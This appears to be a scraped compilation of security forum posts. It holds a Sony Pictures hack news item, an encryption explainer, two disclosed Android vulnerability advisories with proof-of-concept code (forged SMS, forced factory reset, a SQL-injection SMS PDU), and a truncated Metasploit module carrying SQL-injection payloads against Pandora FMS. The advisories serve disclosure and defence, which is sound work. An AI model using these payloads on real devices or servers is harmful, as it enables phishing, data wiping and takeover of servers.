SONY PICTURES is still coming to terms with the hacker assault on its services, and is experiencing problems with its communications systems. The firm has not yet responded to our requests for information, but its web server has. The email system has responded to two of our questions, the first saying that it was struggling to receive messages, and the second to alert us to "disruption" at its end. There is some good news for Sony, as the information referred to in the hack has not yet been released. Sony lost control of its desktops, phone lines and perhaps a whack of data at the hands of a hacker and the Twitter tag #GOP on Monday. Reports claim that the firm has been brought to its knees by a hacker who has threatened to release information that Sony Pictures would perhaps rather not have shared. The company has admitted that it is looking into "an IT matter", but the screenshot being shown online (above) suggests that the hacker has serious intentions. The message reads: 'Hacked By #GOP. Warning: We've already warned you, and this is just a beginning. We continue till our request be met. 'Below the message is a collection of links claiming to be internal Sony Pictures information relating to something called SPED. The meaning of SPED is unclear, but it suggests that the information does not relate to Sony's PlayStation, which comes under the SCEE banner internally. GOP may stand for Guardians of Peace, but we have been unable to confirm this. We are downloading one of the ZIP files linked to on the original message. A Sony Pictures spokesperson told the US Deadline website that something was going on, but said only: Anecdotal reports online say that Sony has reverted to pens and paper, and presumably bartering and raising livestock, as it comes to terms with a lack of access to Twitter. A collection of movie type accounts have been plunged into the wilderness, and there is a lack of access to office basics like email. The motive is currently unclear but the suggestion is that someone, maybe an ex-employee, has a grudge against Sony Pictures. Source

Plenty of companies brag that their communications app is encrypted. But that marketing claim demands a followup question: Who has the key? In many cases, the company itself holds the cryptographic key data that lets it decrypt your messages—and so, therefore, does any hacker who compromises the company or government official standing over its shoulder. But increasingly, privacy-conscious communications tools are rolling out a feature known as “end-to-end encryption.” That “end-to-end” promise means that messages are encrypted in a way that allows only the unique recipient of a message to decrypt it, and not anyone in between. In other words, only the endpoint computers hold the cryptographic keys, and the company’s server acts as an illiterate messenger, passing along messages that it can’t itself decipher. That notion of the decryption key never leaving the user’s device might seem like a paradox. If the company’s server can never see the key, then how does it get onto the device when the user installs the app in the first place? The answer is possible because of another crypto trick known as public-key encryption. In public key crypto systems, a program on your computer mathematically generates a pair of keys. One, called the private key or secret key, is used for decrypting messages sent to you and never leaves your device. The other, called the public key, is used for encrypting messages that are sent to you, and it’s designed so that only the corresponding private key can decrypt those messages. That key can be shared with anyone who wants to encrypt a message to you. Think of the system like a lockbox on your doorstep for the UPS delivery man: anyone with your public key can put something in the box and lock it, but only you have the private key to unlock it. The first free, widely used end-to-end encrypted messaging software was PGP, or Pretty Good Privacy, a program coded by Phil Zimmermann and released in 1991. But it’s taken decades for that complete encryption tunnel to reach the masses. Programs like the “Off The Record” plugin for Jabber instant-messaging applications and TextSecure for text messaging have made end-to-end encryption far easier to use. Apple uses a form of end-to-end encryption in its iMessage app. (Though some security researchers have pointed to flaws in its implementation that might allow its messages to be decrypted.) Google is experimenting with an end-to-end encryption email plugin for Chrome. And just last week smartphone messaging app Whatsapp integrated TextSecure into its Android software, turning on end-to-end encryption for hundreds of millions of users. Even end-to-end encryption isn’t necessarily impervious from snooping. Rather than try to actually break the encryption, for instance, an eavesdropper may try to impersonate a message recipient so that messages are encrypted to their public key instead of the one the sender intended. After decrypting the message, the snoop can then encrypt it to the recipient’s actual public key and send it on again to avoid detection; this is what’s known as a man-in-the-middle attack. To combat that tactic, some end-to-end encryption programs generate unique one-time strings of characters based on the two users’ public keys. The two people communicating read out that passphrase to each other before starting their conversation. If the characters match, they can be reassured there’s no man in the middle. Of course, there are still two vulnerable points left in even perfect end-to-end encryption systems: the ends. Each users’ computer can still be hacked to steal his or her cryptographic key or simply read the recipients’ decrypted messages. Even the most perfectly encrypted communication pipe is only as secure as the mailbox on the other end. Hacker Lexicon is WIRED’s explainer series that seeks to de-mystify the jargon of information security, surveillance and privacy. Source

INTRODUCTION ================================== In Android <5.0 (and maybe >= 4.0), Settings application leaks Pendingintent with a blank base intent (neither the component nor the action is explicitly set) to third party application, bad app can use this to broadcast intent with the same permissions and identity of the Settings application, which runs as SYSTEM uid. Thus bad app can broadcast sensitive intent with the permission of SYSTEM. DETAILS ================================== The vulnerability exists in the AddAccountSettings.java in the Settings app: https://android.googlesource.com/platform/packages/apps/Settings/+/android-4.4.4_r2.0.1/src/com/android/settings/accounts/AddAccountSettings.java In the method addAccount, a PendingIntent is created by getBroadcast, the problem here is both the action and the component are not explicitly set: private void addAccount(String accountType) { Bundle addAccountOptions = new Bundle(); mPendingIntent = PendingIntent.getBroadcast(this, 0, new Intent(), 0); addAccountOptions.putParcelable(KEY_CALLER_IDENTITY, mPendingIntent); addAccountOptions.putBoolean(EXTRA_HAS_MULTIPLE_USERS, Utils.hasMultipleUsers(this)); AccountManager.get(this).addAccount( accountType, null, /* authTokenType */ null, /* requiredFeatures */ addAccountOptions, null, mCallback, null /* handler */); mAddAccountCalled = true; } This PendingIntent is then stored in the addAccountOptions, which will be sent to another application. According to android developer guides, this is not secure: (see http://developer.android.com/reference/android/app/PendingIntent.html) "By giving a PendingIntent to another application, you are granting it the right to perform the operation you have specified as if the other application was yourself (with the same permissions and identity). As such, you should be careful about how you build the PendingIntent: almost always, for example, the base Intent you supply should have the component name explicitly set to one of your own components, to ensure it is ultimately sent there and nowhere else." The bad app can register as an account authenticator by writing a service with the following intent filter (no permission is needed): <intent-filter> <action android:name="android.accounts.AccountAuthenticator" /> </intent-filter> Then bad app can send an intent to Settings app and request Settings app to add account of requested account type: Intent intent = new Intent(); intent.setComponent(new ComponentName("com.android.settings","com.android.settings.accounts.AddAccountSettings")); intent.setAction(Intent.ACTION_RUN); intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); String authTypes[] = {AccountGeneral.ACCOUNT_TYPE}; intent.putExtra("account_types", authTypes); startActivity(intent); Upon receiving such an intent, Settings app will (automatically) call the method addAccount (whose vulnerability is explained as above) and sent the pendingIntent to bad app's addAccount method. Since the pendingIntent's actions and components are blank, bad app can fillin arbitrary action and extra information into this intent and resending this pending intent, with the permission of SYSTEM. For example, bad app can create a phishing SMS in the phone with the following POC: public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException { ... PendingIntent pendingIntent = (PendingIntent)options.getParcelable("pendingIntent"); Intent newIntent = new Intent(); newIntent.setAction("android.provider.Telephony.SMS_RECEIVED"); //filling phishing sms pdu data newIntent.putExtra( "pdus" , new Object[] { pdu }); newIntent.putExtra("format", "3gpp"); try { pendingIntent.send(mContext, 0, newIntent, null, null); } catch (CanceledException e) { // TODO Auto-generated catch block e.printStackTrace(); } Or force the phone to factory reset to delete user's data with the following POC: public Bundle addAccount(AccountAuthenticatorResponse response, String accountType, String authTokenType, String[] requiredFeatures, Bundle options) throws NetworkErrorException { PendingIntent test = (PendingIntent)options.getParcelable("pendingIntent"); Intent newIntent2 = new Intent("android.intent.action.MASTER_CLEAR"); try { test.send(mContext, 0, newIntent2, null, null); } catch (CanceledException e) { // TODO Auto-generated catch block e.printStackTrace(); } This has been fixed in android 5.0 (android bug id 17356824) https://android.googlesource.com/platform/packages/apps/Settings/+/f5d3e74ecc2b973941d8adbe40c6b23094b5abb7 TIMELINE ================================== 02.09.2014 Initial report to Android Security Team with the phishing SMS POC 03.09.2014 Reply from Android Security Team "opened an internal inquiry about this" 09.09.2014 Find a new factory reset POC and notify Android Security Team 10.09.2014 Reply from Android Security Team "We do acknowledge the issue" 04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, ask Android Security Team when this can be published 09.11.2014 Contact MITRE about this issue 20.11.2014 CVE-2014-8609 assigned 25.11.2014 Got Permission from Android Security Team to publish this 26.11.2014 Public Disclosure IDENTIFIERS ================================== CVE-2014-8609 Android id 17356824 CREDITS ================================== WangTao (neobyte) of Baidu X-Team WangYu of Baidu X-Team Zhang Donghui of Baidu X-Team Source

INTRODUCTION ================================== In Android <5.0, a SQL injection vulnerability exists in the opt module WAPPushManager, attacker can remotely send malformed WAPPush message to launch any activity or service in the victim's phone (need permission check) DETAILS ================================== When a WAPPush message is received, the raw pdu is processed by dispatchWapPdu method in com\android\internal\telephony\WapPushOverSms.java Here the pdu is parsed to get the contentType & wapAppId: String mimeType = pduDecoder.getValueString(); ... /** * Seek for application ID field in WSP header. * If application ID is found, WapPushManager substitute the message * processing. Since WapPushManager is optional module, if WapPushManager * is not found, legacy message processing will be continued. */ if (pduDecoder.seekXWapApplicationId(index, index + headerLength - 1)) { index = (int) pduDecoder.getValue32(); pduDecoder.decodeXWapApplicationId(index); String wapAppId = pduDecoder.getValueString(); if (wapAppId == null) { wapAppId = Integer.toString((int) pduDecoder.getValue32()); } String contentType = ((mimeType == null) ? Long.toString(binaryContentType) : mimeType); if (DBG) Rlog.v(TAG, "appid found: " + wapAppId + ":" + contentType); The wapAppId & contentType can be literal string embeded in the pdu, to prove this, we can launch Android 4.4 emulator and send sms pdu by telnet console Type the following command in telnet console: sms pdu 0040000B915121551532F40004800B05040B84C0020003F001010A065603B081EAAF2720756e696f6e2073656c65637420302c27636f6d2e616e64726f69642e73657474696e6773272c27636f6d2e616e64726f69642e73657474696e67732e53657474696e6773272c302c302c302d2d200002066A008509036D6F62696C65746964696E67732E636F6D2F0001 And watch the radio logcat message in emulator, it prints out the extracted malicious appid: ' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0-- However, since the WAPPushManager is optional, it is not installed in the emulator, so it then prints "wap push manager not found!" But if the WAPPushManager is installed, the extracted wapAppId & contentType will be send to its method processMessage: try { boolean processFurther = true; IWapPushManager wapPushMan = mWapPushManager; if (wapPushMan == null) { if (DBG) Rlog.w(TAG, "wap push manager not found!"); } else { Intent intent = new Intent(); intent.putExtra("transactionId", transactionId); intent.putExtra("pduType", pduType); intent.putExtra("header", header); intent.putExtra("data", intentData); intent.putExtra("contentTypeParameters", pduDecoder.getContentParameters()); int procRet = wapPushMan.processMessage(wapAppId, contentType, intent); So we go on checking the source code of WAPPushManager: https://android.googlesource.com/platform/frameworks/base/+/android-4.4.4_r2.0.1/packages/WAPPushManager/ In the method processMessage, the app_id and content_type is used in the method queryLastApp: public int processMessage(String app_id, String content_type, Intent intent) throws RemoteException { Log.d(LOG_TAG, "wpman processMsg " + app_id + ":" + content_type); WapPushManDBHelper dbh = getDatabase(mContext); SQLiteDatabase db = dbh.getReadableDatabase(); WapPushManDBHelper.queryData lastapp = dbh.queryLastApp(db, app_id, content_type); db.close(); Then in the method queryLastApp, both app_id and content_type is concatenated without any escaping to build the rawQuery sql input, protected queryData queryLastApp(SQLiteDatabase db, String app_id, String content_type) { String sql = "select install_order, package_name, class_name, " + " app_type, need_signature, further_processing" + " from " + APPID_TABLE_NAME + " where x_wap_application=\'" + app_id + "\'" + " and content_type=\'" + content_type + "\'" + " order by install_order desc"; if (DEBUG_SQL) Log.v(LOG_TAG, "sql: " + sql); Cursor cur = db.rawQuery(sql, null); Obviously, this is a SQL injection, for example, if app_id is as follows: ' union select 0,'com.android.settings','com.android.settings.Settings',0,0,0-- Then the package_name & class_name of query result would be: "com.android.settings" and "com.android.settings.Setttings" OK, then we return back to the method processMessage of WAPPushManager The appType, packageName, className is fully controllable, which will be used to set the component of an intent to start a activity or service That means, attacker can remotely launch any activity or service by construct malformed WAPPush Message (need permission check) if (lastapp.appType == WapPushManagerParams.APP_TYPE_ACTIVITY) { //Intent intent = new Intent(Intent.ACTION_MAIN); intent.setClassName(lastapp.packageName, lastapp.className); intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); try { mContext.startActivity(intent); } catch (ActivityNotFoundException e) { Log.w(LOG_TAG, "invalid name " + lastapp.packageName + "/" + lastapp.className); return WapPushManagerParams.INVALID_RECEIVER_NAME; } } else { intent.setClassName(mContext, lastapp.className); intent.setComponent(new ComponentName(lastapp.packageName, lastapp.className)); if (mContext.startService(intent) == null) { Log.w(LOG_TAG, "invalid name " + lastapp.packageName + "/" + lastapp.className); return WapPushManagerParams.INVALID_RECEIVER_NAME; } } This has been fixed in android 5.0 (android bug id 17969135) https://android.googlesource.com/platform/frameworks/base/+/48ed835468c6235905459e6ef7df032baf3e4df6 TIMELINE ================================== 11.10.2014 Initial report to Android Security Team with the POC 14.10.2014 Reply from Android Security Team "are looking into it" 04.11.2014 Android 5.0 source code is open, the fix for this issue is found in change log, request status update 08.11.2014 Reply from Android Security Team "have fixed the issue in L (which is now in AOSP) and have provided patches to partners" 09.11.2014 Contact MITRE about this issue 17.11.2014 CVE-2014-8507 assigned 26.11.2014 Public Disclosure IDENTIFIERS ================================== CVE-2014-8507 Android id 17969135 CREDITS ================================== WangTao (neobyte) of Baidu X-Team WangYu of Baidu X-Team Zhang Donghui of Baidu X-Team Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => 'Pandora FMS SQLi Remote Code Execution', 'Description' => %q{ This module attempts to exploit multiple issues in order to gain remote code execution under Pandora FMS version <= 5.0 SP2. First, an attempt to authenticate using default credentials is performed. If this method fails, a SQL injection vulnerability is leveraged in order to extract the "Auto Login" password hash. If this value is not set, the module will then extract the administrator account's MD5 password hash. }, 'License' => MSF_LICENSE, 'Author' => [ 'Lincoln <Lincoln[at]corelan.be>', # Discovery, Original Proof of Concept 'Jason Kratzer <pyoor[at]corelan.be>' # Metasploit Module ], 'References' => [ ['URL', 'http://pandorafms.com/downloads/whats_new_5-SP3.pdf'], ['URL', 'http://blog.pandorafms.org/?p=2041'] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['Pandora FMS version <= 5.0 SP2', {}] ], 'Privileged' => false, 'Payload' => { 'Space' => 50000, 'DisableNops' => true, }, 'DisclosureDate' => "Feb 1 2014", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the vulnerable Pandora FMS instance', '/pandora_console/']), OptString.new('USER', [false, 'The username to authenticate with', 'admin']), OptString.new('PASS', [false, 'The password to authenticate with', 'pandora']), ], self.class) end def uri target_uri.path end def check vprint_status("#{peer} - Trying to detect installed version") version = nil res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'index.php') }) if res && res.code == 200 && res.body =~ /Pandora FMS - the Flexible Monitoring System/ if res.body =~ /<div id="ver_num">v(.*?)<\/div>/ version = $1 else return Exploit::CheckCode::Detected end end unless version.nil? vprint_status("#{peer} - Pandora FMS #{version} found") if Gem::Version.new(version) <= Gem::Version.new('5.0SP2') return Exploit::CheckCode::Appears end end Exploit::CheckCode::Safe end # Attempt to login with credentials (default admin:pandora) def authenticate res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { 'login' => "1", }, 'vars_post' => { 'nick' => datastore['USER'], 'pass' => datastore['PASS'], 'Login' => 'Login', } }) return auth_succeeded?(res) end # Attempt to login with auto login and SQLi def login_hash clue = rand_text_alpha(8) sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join # select value from tconfig where token = 'loginhash_pwd'; sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST" sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 " sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP " sqli << "BY x)a) AND 'msf'='msf" password = inject_sql(sqli, clue) if password && password.length != 0 print_status("#{peer} - Extracted auto login password (#{password})") else print_error("#{peer} - No auto login password has been defined!") return false end print_status("#{peer} - Attempting to authenticate using (admin:#{password})") # Attempt to login using login hash password res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'index.php'), 'vars_get' => { 'loginhash' => 'auto', }, 'vars_post' => { 'loginhash_data' => Rex::Text.md5("admin#{password}"), 'loginhash_user' => 'admin', } }) return auth_succeeded?(res) end def auth_succeeded?(res) if res && res.code == 200 && res.body.include?('Welcome to Pandora FMS') print_status("#{peer} - Successfully authenticated!") print_status("#{peer} - Attempting to retrieve session cookie") @cookie }, 1) end end Source

Eh, cu indulgenta 5 ani oricum in aceste momente cenzura este prezenta pe internet doar ca nu e chiar asa "aspra" oricum inca o veste proasta.

De ce jignesti omul? Ceea ce face este de apreciat, hai sa nu o dam in deastea... mai bine iti ti comentariile rautacioase doar pentru tine.

Acum am intrat pe windows si nu-l detecteaza nici la mine Kaspersky... @adrenalintm ai cumparat licenta sau e ...